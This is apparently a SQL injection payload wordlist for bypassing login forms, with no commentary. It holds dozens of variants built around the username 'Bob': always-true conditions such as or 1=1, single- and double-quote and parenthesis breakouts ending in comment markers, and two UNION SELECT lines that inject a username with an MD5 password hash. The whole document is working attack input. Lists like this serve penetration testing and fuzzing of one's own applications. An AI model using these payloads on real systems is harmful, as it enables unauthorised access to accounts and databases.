or 1=1
or 1=1--
or 1=1#
or 1=1/*
Bob' --
Bob' #
Bob'/*
Bob' or '1'='1
Bob' or '1'='1'--
Bob' or '1'='1'#
Bob' or '1'='1'/*
Bob'or 1=1 or ''='
Bob' or 1=1
Bob' or 1=1--
Bob' or 1=1#
Bob' or 1=1/*
Bob') or ('1'='1
Bob') or ('1'='1'--
Bob') or ('1'='1'#
Bob') or ('1'='1'/*
Bob') or '1'='1
Bob') or '1'='1'--
Bob') or '1'='1'#
Bob') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'Bob', '81dc9bdb52d04dc20036dbd8313ed055
Bob" --
Bob" #
Bob"/*
Bob" or "1"="1
Bob" or "1"="1"--
Bob" or "1"="1"#
Bob" or "1"="1"/*
Bob"or 1=1 or ""="
Bob" or 1=1
Bob" or 1=1--
Bob" or 1=1#
Bob" or 1=1/*
Bob") or ("1"="1
Bob") or ("1"="1"--
Bob") or ("1"="1"#
Bob") or ("1"="1"/*
Bob") or "1"="1
Bob") or "1"="1"--
Bob") or "1"="1"#
Bob") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "Bob", "81dc9bdb52d04dc20036dbd8313ed055